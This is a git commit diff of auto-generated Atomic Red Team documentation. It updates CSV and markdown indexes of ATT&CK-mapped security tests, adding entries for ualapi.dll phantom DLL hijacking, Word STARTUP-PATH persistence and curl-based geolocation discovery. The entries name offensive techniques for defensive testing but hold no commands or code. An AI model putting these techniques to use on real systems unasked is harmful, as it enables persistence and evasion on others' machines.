Generated docs from job=generate-docs branch=master [ci skip]

2024-08-13 17:34:09 +00:00
parent c51f854f36
commit c52d0023e3
37 changed files with 570 additions and 17 deletions
@@ -2,7 +2,7 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1630-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1634-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)

 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
@@ -118,6 +118,7 @@ defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUt
 defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
 defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
+defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
 defense-evasion,T1553.001,Subvert Trust Controls: Gatekeeper Bypass,1,Gatekeeper Bypass,fb3d46c6-9480-4803-8d7d-ce676e1f1a9b,sh
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
@@ -711,6 +712,7 @@ privilege-escalation,T1098.003,Account Manipulation: Additional Cloud Roles,2,Si
 privilege-escalation,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
 privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
+privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
 privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -858,6 +860,7 @@ privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Star
 privilege-escalation,T1546,Event Triggered Execution,5,Adding custom debugger for Windows Error Reporting,17d1a3cc-3373-495a-857a-e5dd005fb302,command_prompt
 privilege-escalation,T1546,Event Triggered Execution,6,Load custom DLL on mstsc execution,2db7852e-5a32-4ec7-937f-f4e027881700,command_prompt
 privilege-escalation,T1546,Event Triggered Execution,7,Persistence using automatic execution of custom DLL during RDP session,b7fc4c3f-fe6e-479a-ba27-ef91b88536e3,command_prompt
+privilege-escalation,T1546,Event Triggered Execution,8,Persistence using STARTUP-PATH in MS-WORD,f0027655-25ef-47b0-acaf-3d83d106156c,command_prompt
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
@@ -1090,6 +1093,7 @@ persistence,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate -
 persistence,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
+persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
 persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
 persistence,T1137.006,Office Application Startup: Add-ins,3,Persistent Code Execution Via Word Add-in File (WLL),95408a99-4fa7-4cd6-a7ef-cb65f86351cf,powershell
@@ -1225,6 +1229,7 @@ persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process
 persistence,T1546,Event Triggered Execution,5,Adding custom debugger for Windows Error Reporting,17d1a3cc-3373-495a-857a-e5dd005fb302,command_prompt
 persistence,T1546,Event Triggered Execution,6,Load custom DLL on mstsc execution,2db7852e-5a32-4ec7-937f-f4e027881700,command_prompt
 persistence,T1546,Event Triggered Execution,7,Persistence using automatic execution of custom DLL during RDP session,b7fc4c3f-fe6e-479a-ba27-ef91b88536e3,command_prompt
+persistence,T1546,Event Triggered Execution,8,Persistence using STARTUP-PATH in MS-WORD,f0027655-25ef-47b0-acaf-3d83d106156c,command_prompt
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
 persistence,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
@@ -1879,6 +1884,8 @@ discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573b
 discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
 discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 discovery,T1012,Query Registry,4,Reg query for AlwaysInstallElevated status,6fb4c4c5-f949-4fd2-8af5-ddbc61595223,command_prompt
+discovery,T1614,System Location Discovery,1,Get geolocation info through IP-Lookup services using curl Windows,fe53e878-10a3-477b-963e-4367348f5af5,command_prompt
+discovery,T1614,System Location Discovery,2,"Get geolocation info through IP-Lookup services using curl freebsd, linux or macos",552b4db3-8850-412c-abce-ab5cc8a86604,bash
 discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -367,6 +367,7 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,3,Disco
 discovery,T1614.001,System Location Discovery: System Language Discovery,4,Discover System Language with localectl,07ce871a-b3c3-44a3-97fa-a20118fdc7c9,sh
 discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
 discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
+discovery,T1614,System Location Discovery,2,"Get geolocation info through IP-Lookup services using curl freebsd, linux or macos",552b4db3-8850-412c-abce-ab5cc8a86604,bash
 discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
 discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - pgrep (FreeBSD),fa96c21c-5fd6-4428-aa28-51a2fbecdbdc,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
@@ -234,6 +234,7 @@ discovery,T1049,System Network Connections Discovery,3,"System Network Connectio
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
 discovery,T1201,Password Policy Discovery,8,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
+discovery,T1614,System Location Discovery,2,"Get geolocation info through IP-Lookup services using curl freebsd, linux or macos",552b4db3-8850-412c-abce-ab5cc8a86604,bash
 discovery,T1518.001,Software Discovery: Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
 discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
@@ -66,6 +66,7 @@ defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,7,InstallUt
 defense-evasion,T1218.004,Signed Binary Proxy Execution: InstallUtil,8,InstallUtil evasive invocation,559e6d06-bb42-4307-bff7-3b95a8254bad,powershell
 defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
+defense-evasion,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
 defense-evasion,T1222.001,File and Directory Permissions Modification: Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
@@ -497,6 +498,7 @@ privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,
 privilege-escalation,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
 privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
+privilege-escalation,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
 privilege-escalation,T1055.003,Thread Execution Hijacking,1,Thread Execution Hijacking,578025d5-faa9-4f6d-8390-aae527d503e1,powershell
 privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 privilege-escalation,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
@@ -600,6 +602,7 @@ privilege-escalation,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Star
 privilege-escalation,T1546,Event Triggered Execution,5,Adding custom debugger for Windows Error Reporting,17d1a3cc-3373-495a-857a-e5dd005fb302,command_prompt
 privilege-escalation,T1546,Event Triggered Execution,6,Load custom DLL on mstsc execution,2db7852e-5a32-4ec7-937f-f4e027881700,command_prompt
 privilege-escalation,T1546,Event Triggered Execution,7,Persistence using automatic execution of custom DLL during RDP session,b7fc4c3f-fe6e-479a-ba27-ef91b88536e3,command_prompt
+privilege-escalation,T1546,Event Triggered Execution,8,Persistence using STARTUP-PATH in MS-WORD,f0027655-25ef-47b0-acaf-3d83d106156c,command_prompt
 privilege-escalation,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 privilege-escalation,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
@@ -747,6 +750,7 @@ persistence,T1137,Office Application Startup,1,Office Application Startup - Outl
 persistence,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
+persistence,T1574.001,Hijack Execution Flow: DLL Search Order Hijacking,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
 persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
 persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
 persistence,T1137.006,Office Application Startup: Add-ins,3,Persistent Code Execution Via Word Add-in File (WLL),95408a99-4fa7-4cd6-a7ef-cb65f86351cf,powershell
@@ -840,6 +844,7 @@ persistence,T1546,Event Triggered Execution,4,WMI Invoke-CimMethod Start Process
 persistence,T1546,Event Triggered Execution,5,Adding custom debugger for Windows Error Reporting,17d1a3cc-3373-495a-857a-e5dd005fb302,command_prompt
 persistence,T1546,Event Triggered Execution,6,Load custom DLL on mstsc execution,2db7852e-5a32-4ec7-937f-f4e027881700,command_prompt
 persistence,T1546,Event Triggered Execution,7,Persistence using automatic execution of custom DLL during RDP session,b7fc4c3f-fe6e-479a-ba27-ef91b88536e3,command_prompt
+persistence,T1546,Event Triggered Execution,8,Persistence using STARTUP-PATH in MS-WORD,f0027655-25ef-47b0-acaf-3d83d106156c,command_prompt
 persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
 persistence,T1546.015,Event Triggered Execution: Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
@@ -1264,6 +1269,7 @@ discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573b
 discovery,T1012,Query Registry,2,Query Registry with Powershell cmdlets,0434d081-bb32-42ce-bcbb-3548e4f2628f,powershell
 discovery,T1012,Query Registry,3,Enumerate COM Objects in Registry with Powershell,0d80d088-a84c-4353-af1a-fc8b439f1564,powershell
 discovery,T1012,Query Registry,4,Reg query for AlwaysInstallElevated status,6fb4c4c5-f949-4fd2-8af5-ddbc61595223,command_prompt
+discovery,T1614,System Location Discovery,1,Get geolocation info through IP-Lookup services using curl Windows,fe53e878-10a3-477b-963e-4367348f5af5,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Software Discovery: Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
@@ -154,6 +154,7 @@
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
  - Atomic Test #2: Phantom Dll Hijacking - WinAppXRT.dll [windows]
+  - Atomic Test #3: Phantom Dll Hijacking - ualapi.dll [windows]
 - [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
  - Atomic Test #1: Gatekeeper Bypass [macos]
 - T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -931,6 +932,7 @@
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
  - Atomic Test #2: Phantom Dll Hijacking - WinAppXRT.dll [windows]
+  - Atomic Test #3: Phantom Dll Hijacking - ualapi.dll [windows]
 - T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.006 Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1131,6 +1133,7 @@
  - Atomic Test #5: Adding custom debugger for Windows Error Reporting [windows]
  - Atomic Test #6: Load custom DLL on mstsc execution [windows]
  - Atomic Test #7: Persistence using automatic execution of custom DLL during RDP session [windows]
+  - Atomic Test #8: Persistence using STARTUP-PATH in MS-WORD [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -1461,6 +1464,7 @@
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
  - Atomic Test #2: Phantom Dll Hijacking - WinAppXRT.dll [windows]
+  - Atomic Test #3: Phantom Dll Hijacking - ualapi.dll [windows]
 - [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
  - Atomic Test #1: Code Executed Via Excel Add-in File (XLL) [windows]
  - Atomic Test #2: Persistent Code Execution Via Excel Add-in File (XLL) [windows]
@@ -1655,6 +1659,7 @@
  - Atomic Test #5: Adding custom debugger for Windows Error Reporting [windows]
  - Atomic Test #6: Load custom DLL on mstsc execution [windows]
  - Atomic Test #7: Persistence using automatic execution of custom DLL during RDP session [windows]
+  - Atomic Test #8: Persistence using STARTUP-PATH in MS-WORD [windows]
 - [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
  - Atomic Test #1: Add command to .bash_profile [macos, linux]
  - Atomic Test #2: Add command to .bashrc [macos, linux]
@@ -2559,7 +2564,9 @@
  - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
  - Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
  - Atomic Test #4: Reg query for AlwaysInstallElevated status [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1614 System Location Discovery](../../T1614/T1614.md)
+  - Atomic Test #1: Get geolocation info through IP-Lookup services using curl Windows [windows]
+  - Atomic Test #2: Get geolocation info through IP-Lookup services using curl freebsd, linux or macos [macos, linux]
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -685,7 +685,8 @@
  - Atomic Test #4: Discover System Language with localectl [linux]
  - Atomic Test #5: Discover System Language by locale file [linux]
  - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1614 System Location Discovery](../../T1614/T1614.md)
+  - Atomic Test #2: Get geolocation info through IP-Lookup services using curl freebsd, linux or macos [macos, linux]
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
  - Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux]
@@ -561,7 +561,8 @@
 - [T1201 Password Policy Discovery](../../T1201/T1201.md)
  - Atomic Test #8: Examine password policy - macOS [macos]
 - T1614.001 System Location Discovery: System Language Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1614 System Location Discovery](../../T1614/T1614.md)
+  - Atomic Test #2: Get geolocation info through IP-Lookup services using curl freebsd, linux or macos [macos, linux]
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
@@ -94,6 +94,7 @@
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
  - Atomic Test #2: Phantom Dll Hijacking - WinAppXRT.dll [windows]
+  - Atomic Test #3: Phantom Dll Hijacking - ualapi.dll [windows]
 - T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
  - Atomic Test #1: Take ownership using takeown utility [windows]
@@ -667,6 +668,7 @@
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
  - Atomic Test #2: Phantom Dll Hijacking - WinAppXRT.dll [windows]
+  - Atomic Test #3: Phantom Dll Hijacking - ualapi.dll [windows]
 - T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
@@ -808,6 +810,7 @@
  - Atomic Test #5: Adding custom debugger for Windows Error Reporting [windows]
  - Atomic Test #6: Load custom DLL on mstsc execution [windows]
  - Atomic Test #7: Persistence using automatic execution of custom DLL during RDP session [windows]
+  - Atomic Test #8: Persistence using STARTUP-PATH in MS-WORD [windows]
 - [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
  - Atomic Test #1: Injection SID-History with mimikatz [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
@@ -1020,6 +1023,7 @@
 - [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
  - Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
  - Atomic Test #2: Phantom Dll Hijacking - WinAppXRT.dll [windows]
+  - Atomic Test #3: Phantom Dll Hijacking - ualapi.dll [windows]
 - [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
  - Atomic Test #1: Code Executed Via Excel Add-in File (XLL) [windows]
  - Atomic Test #2: Persistent Code Execution Via Excel Add-in File (XLL) [windows]
@@ -1157,6 +1161,7 @@
  - Atomic Test #5: Adding custom debugger for Windows Error Reporting [windows]
  - Atomic Test #6: Load custom DLL on mstsc execution [windows]
  - Atomic Test #7: Persistence using automatic execution of custom DLL during RDP session [windows]
+  - Atomic Test #8: Persistence using STARTUP-PATH in MS-WORD [windows]
 - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
  - Atomic Test #1: Authentication Package [windows]
 - [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
@@ -1790,7 +1795,8 @@
  - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
  - Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
  - Atomic Test #4: Reg query for AlwaysInstallElevated status [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1614 System Location Discovery](../../T1614/T1614.md)
+  - Atomic Test #1: Get geolocation info through IP-Lookup services using curl Windows [windows]
 - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -29,7 +29,7 @@
 |  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  |  |  | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) |  |  |  | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  |  |  | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
-|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
